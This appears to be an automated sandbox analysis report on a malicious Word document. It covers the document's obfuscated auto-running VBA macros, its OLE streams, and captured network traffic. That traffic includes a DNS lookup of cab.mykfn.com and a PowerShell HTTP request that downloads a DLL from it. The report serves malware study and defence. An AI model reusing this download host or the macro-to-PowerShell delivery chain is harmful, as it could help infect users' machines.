                                                      noYAHFJkx
                                                      ugTHSC(XFQcotHEl)
                                                      (mXwueE
                                                      (BfQqFX
                                                      ipaAe(SeegFDA)
                                                      TWSLHrEJ,
                                                      vrXECqWF
                                                      (SeegFDA
                                                      dOQMo
                                                      YMkAJIp
                                                      wONTemEFr
                                                      (eKFHKDJw
                                                      UBound(hXmVsAI)
                                                      immQJ
                                                      fQyMHGCJ
                                                      UBound(okSXVy)
                                                      Mid(skuwd,
                                                      OCclfDa.Range
                                                      cxLJIGiD()
                                                      zvYxeGGBh
                                                      lroNB
                                                      UBound(aXyHAY)
                                                      dBfQDv
                                                      LxgTE()
                                                      lZIWVW
                                                      UBound(iXiRFIE)
                                                      HZrrCCPJ
                                                      SeochBB
                                                      Error
                                                      xeQqnwEGH
                                                      Puaskfwqwxz_
                                                      Attribute
                                                      FrGcEy,
                                                      kfglYjE
                                                      MoAcLJ
                                                      yFQRXd
                                                      Function
                                                      lSvxKAE
                                                      vJOKJuk
                                                      mvXsJDCI,
                                                      qucrJCEBy
                                                      XbFndWSCC
                                                      MidB$(LxgTE,
                                                      (GcgMIFBS
                                                      CYtYuIW
                                                      UApNCTSB
                                                      nnjasd
                                                      IIShQCGJH
                                                      (GnnqWGPGJ
                                                      nYfpXuDyH
                                                      QGvuB(WotFy)
                                                      zIlgcDbCD
                                                      ugTHSC
                                                      (FgPjRJEIR
                                                      skuwd
                                                      fLcUFFJA
                                                      VBA Code
                                                      VBA File Name: Hj8dhqrdh_8498, Stream Size: 701
                                                      General
                                                      Stream Path:Macros/VBA/Hj8dhqrdh_8498
                                                      VBA File Name:Hj8dhqrdh_8498
                                                      Stream Size:701
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . b N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                      Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 fa 62 4e df 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                      VBA Code Keywords

                                                      Keyword
                                                      Attribute
                                                      VB_Name
                                                      VBA Code
                                                      VBA File Name: Sky5mdbfre3xe7q8, Stream Size: 1115
                                                      General
                                                      Stream Path:Macros/VBA/Sky5mdbfre3xe7q8
                                                      VBA File Name:Sky5mdbfre3xe7q8
                                                      Stream Size:1115
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . . b . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                      Data Raw:01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 fa 62 c2 6b 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                      VBA Code Keywords

                                                      Keyword
                                                      Document_open()
                                                      False
                                                      Private
                                                      VB_Exposed
                                                      Attribute
                                                      VB_Creatable
                                                      VB_Name
                                                      VB_PredeclaredId
                                                      VB_GlobalNameSpace
                                                      VB_Base
                                                      VB_Customizable
                                                      VB_TemplateDerived
                                                      VBA Code

                                                      Streams

                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                                      General
                                                      Stream Path:\x1CompObj
                                                      File Type:data
                                                      Stream Size:146
                                                      Entropy:4.00187355764
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                      General
                                                      Stream Path:\x5DocumentSummaryInformation
                                                      File Type:data
                                                      Stream Size:4096
                                                      Entropy:0.280441275353
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 528
                                                      General
                                                      Stream Path:\x5SummaryInformation
                                                      File Type:data
                                                      Stream Size:528
                                                      Entropy:4.04926305468
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 e0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 64 01 00 00 04 00 00 00 4c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 d0 00 00 00 09 00 00 00 dc 00 00 00
                                                      Stream Path: 1Table, File Type: data, Stream Size: 6861
                                                      General
                                                      Stream Path:1Table
                                                      File Type:data
                                                      Stream Size:6861
                                                      Entropy:6.02856268982
                                                      Base64 Encoded:True
                                                      Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                                      Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                                      Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
                                                      General
                                                      Stream Path:Macros/PROJECT
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Stream Size:527
                                                      Entropy:5.49968943522
                                                      Base64 Encoded:True
                                                      Data ASCII:I D = " { D C 2 3 F 3 6 1 - 8 9 7 5 - 4 E 8 5 - B 2 7 9 - 1 5 E 2 D 2 0 E 1 4 0 C } " . . D o c u m e n t = S k y 5 m d b f r e 3 x e 7 q 8 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = H j 8 d h q r d h _ 8 4 9 8 . . M o d u l e = D u l z 0 g 2 a 3 q q d j s t y 7 . . E x e N a m e 3 2 = " A l 3 m j h l b y h g 8 x a x a v " . . N a m e = " D D " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B A B 8 0 5 3 5 4 3 3 9 4 3 3 9 4 3 3 9 4 3 3 9 "
                                                      Data Raw:49 44 3d 22 7b 44 43 32 33 46 33 36 31 2d 38 39 37 35 2d 34 45 38 35 2d 42 32 37 39 2d 31 35 45 32 44 32 30 45 31 34 30 43 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 6b 79 35 6d 64 62 66 72 65 33 78 65 37 71 38 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 48 6a 38 64 68 71 72 64 68 5f 38 34 39 38 0d 0a 4d 6f 64 75 6c 65 3d 44 75 6c 7a 30 67 32 61 33 71 71 64 6a 73 74
                                                      Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 152
                                                      General
                                                      Stream Path:Macros/PROJECTwm
                                                      File Type:data
                                                      Stream Size:152
                                                      Entropy:3.89422423899
                                                      Base64 Encoded:True
                                                      Data ASCII:S k y 5 m d b f r e 3 x e 7 q 8 . S . k . y . 5 . m . d . b . f . r . e . 3 . x . e . 7 . q . 8 . . . H j 8 d h q r d h _ 8 4 9 8 . H . j . 8 . d . h . q . r . d . h . _ . 8 . 4 . 9 . 8 . . . D u l z 0 g 2 a 3 q q d j s t y 7 . D . u . l . z . 0 . g . 2 . a . 3 . q . q . d . j . s . t . y . 7 . . . . .
                                                      Data Raw:53 6b 79 35 6d 64 62 66 72 65 33 78 65 37 71 38 00 53 00 6b 00 79 00 35 00 6d 00 64 00 62 00 66 00 72 00 65 00 33 00 78 00 65 00 37 00 71 00 38 00 00 00 48 6a 38 64 68 71 72 64 68 5f 38 34 39 38 00 48 00 6a 00 38 00 64 00 68 00 71 00 72 00 64 00 68 00 5f 00 38 00 34 00 39 00 38 00 00 00 44 75 6c 7a 30 67 32 61 33 71 71 64 6a 73 74 79 37 00 44 00 75 00 6c 00 7a 00 30 00 67 00 32 00
                                                      Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 6005
                                                      General
                                                      Stream Path:Macros/VBA/_VBA_PROJECT
                                                      File Type:data
                                                      Stream Size:6005
                                                      Entropy:5.67360235538
                                                      Base64 Encoded:True
                                                      Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                                      Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                                      Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 682
                                                      General
                                                      Stream Path:Macros/VBA/dir
                                                      File Type:data
                                                      Stream Size:682
                                                      Entropy:6.42612592717
                                                      Base64 Encoded:True
                                                      Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . D 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . N . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . ) . m . . . . ! O f f i c
                                                      Data Raw:01 a6 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 44 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 4e d7 fa 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                                      Stream Path: WordDocument, File Type: data, Stream Size: 114302
                                                      General
                                                      Stream Path:WordDocument
                                                      File Type:data
                                                      Stream Size:114302
                                                      Entropy:7.29269826557
                                                      Base64 Encoded:True
                                                      Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . ! ` . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . ! X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                      Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 21 60 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e be 01 00 62 7f 00 00 62 7f 00 00 21 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                                      Stream Path: word, File Type: data, Stream Size: 424
                                                      General
                                                      Stream Path:word
                                                      File Type:data
                                                      Stream Size:424
                                                      Entropy:7.46732697397
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . 6 . v . . b [ 0 . . . 6 . . . . ) [ ) . o V = . . 1 q . . X . . . . . . . h e . . . . . Z 1 C w . . X . . . 5 . . . U . . f . . . . ( } . ~ . . . Y . . . . ~ . . . . . . K ) _ . . U . . . . . . . . . . . d . . . a . . L . . . . . S . . c . . . - ( . . % y ; . . . . . ( u . i i . . . e x W . E + . Y . 3 w . ? - V ; M . j . . . . # < N | . . . ^ . . . 2 . . . i . . . . e c . @ . . r . . R . . y . 4 . . . i . f . . 6 . . . j u . p W . e M . ^ . . a 3 . . S . . . . . . q J & - . . . . / . | . . . . .
                                                      Data Raw:e0 e4 ab a4 36 f0 76 0e c5 62 5b 30 1f 7f a3 36 98 99 87 a5 29 5b 29 fd 6f 56 3d d8 b8 31 71 f5 95 58 d0 e3 0d 1a a6 08 b8 68 65 d0 13 ba c2 89 5a 31 43 77 e2 0c 58 85 ba ae 35 e0 b2 9e 55 93 f0 66 9a c7 ae bf 28 7d f3 7e ed c1 f6 59 e9 b4 93 b4 7e 87 ee fa 12 89 ff 4b 29 5f e5 c5 55 1a 12 d1 df ad 20 fa da 9b 08 c5 84 64 1f 96 8f 61 c4 80 4c fe 1f cd a5 f6 53 11 c7 63 96 c9 97 2d

                                                      Network Behavior

                                                      Snort IDS Alerts

                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                      01/26/21-19:56:54.693763ICMP399ICMP Destination Unreachable Host Unreachable69.38.130.14192.168.2.22
                                                      01/26/21-19:56:57.693739ICMP399ICMP Destination Unreachable Host Unreachable69.38.130.14192.168.2.22

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 26, 2021 19:55:50.627707005 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:50.810802937 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:50.811000109 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:50.813492060 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:50.996479034 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.108664989 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.108725071 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.108763933 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.108803988 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.108841896 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.108854055 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.108884096 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.108922958 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.108925104 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.108953953 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.109600067 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.109675884 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.109838009 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.109949112 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.110044003 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.293565035 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293591022 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293602943 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293615103 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293627024 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293638945 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293651104 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293673992 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293695927 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293709040 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293723106 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293739080 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293739080 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.293751955 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293765068 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293778896 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293791056 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293802023 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.293858051 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.293884039 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.293979883 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.294008017 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.294023991 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.294090986 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.294301987 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.476910114 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.476980925 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.477026939 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.477041006 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.477107048 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.477108002 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.477226973 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.477286100 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.477302074 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.477371931 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.477446079 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.477567911 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.477654934 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.477787971 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.477852106 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.477884054 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.477912903 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.477948904 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.478033066 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.478085041 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.478296041 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.478327036 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.478380919 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.478490114 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.478521109 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.478568077 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.478653908 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.478743076 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.478792906 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.478950024 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.478981018 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.479026079 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.479160070 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.479327917 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.479362011 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.479394913 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.479448080 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.479522943 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.479624033 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.479748011 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.479830980 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.479917049 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.480010033 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.480082035 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.480082035 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.480262995 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.480343103 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.480415106 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.480496883 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.480557919 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.480609894 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.480700970 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.480731010 CET8049165103.143.46.51192.168.2.22
                                                      Jan 26, 2021 19:55:51.480751991 CET4916580192.168.2.22103.143.46.51
                                                      Jan 26, 2021 19:55:51.480813980 CET8049165103.143.46.51192.168.2.22

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jan 26, 2021 19:55:50.186603069 CET5219753192.168.2.228.8.8.8
                                                      Jan 26, 2021 19:55:50.611752033 CET53521978.8.8.8192.168.2.22

                                                      ICMP Packets

                                                      TimestampSource IPDest IPChecksumCodeType
                                                      Jan 26, 2021 19:56:54.693763018 CET69.38.130.14192.168.2.228718(Host unreachable)Destination Unreachable
                                                      Jan 26, 2021 19:56:57.693738937 CET69.38.130.14192.168.2.228718(Host unreachable)Destination Unreachable

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                      Jan 26, 2021 19:55:50.186603069 CET192.168.2.228.8.8.80xa6edStandard query (0)cab.mykfn.comA (IP address)IN (0x0001)

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                      Jan 26, 2021 19:55:50.611752033 CET8.8.8.8192.168.2.220xa6edNo error (0)cab.mykfn.com103.143.46.51A (IP address)IN (0x0001)

                                                      HTTP Request Dependency Graph

                                                      • cab.mykfn.com

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                      0192.168.2.2249165103.143.46.5180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampkBytes transferredDirectionData
                                                      Jan 26, 2021 19:55:50.813492060 CET0OUTGET /admin/X/ HTTP/1.1
                                                      Host: cab.mykfn.com
                                                      Connection: Keep-Alive
                                                      Jan 26, 2021 19:55:51.108664989 CET1INHTTP/1.1 200 OK
                                                      Date: Tue, 26 Jan 2021 18:59:03 GMT
                                                      Server: Apache
                                                      X-Powered-By: PHP/7.2.26
                                                      Cache-Control: no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Tue, 26 Jan 2021 18:59:03 GMT
                                                      Content-Disposition: attachment; filename="25tKOPKVWtIdM19idoHqc.dll"
                                                      Content-Transfer-Encoding: binary
                                                      Set-Cookie: 60106677a0544=1611687543; expires=Tue, 26-Jan-2021 19:00:03 GMT; Max-Age=60; path=/
                                                      Last-Modified: Tue, 26 Jan 2021 18:59:03 GMT
                                                      Keep-Alive: timeout=5, max=40
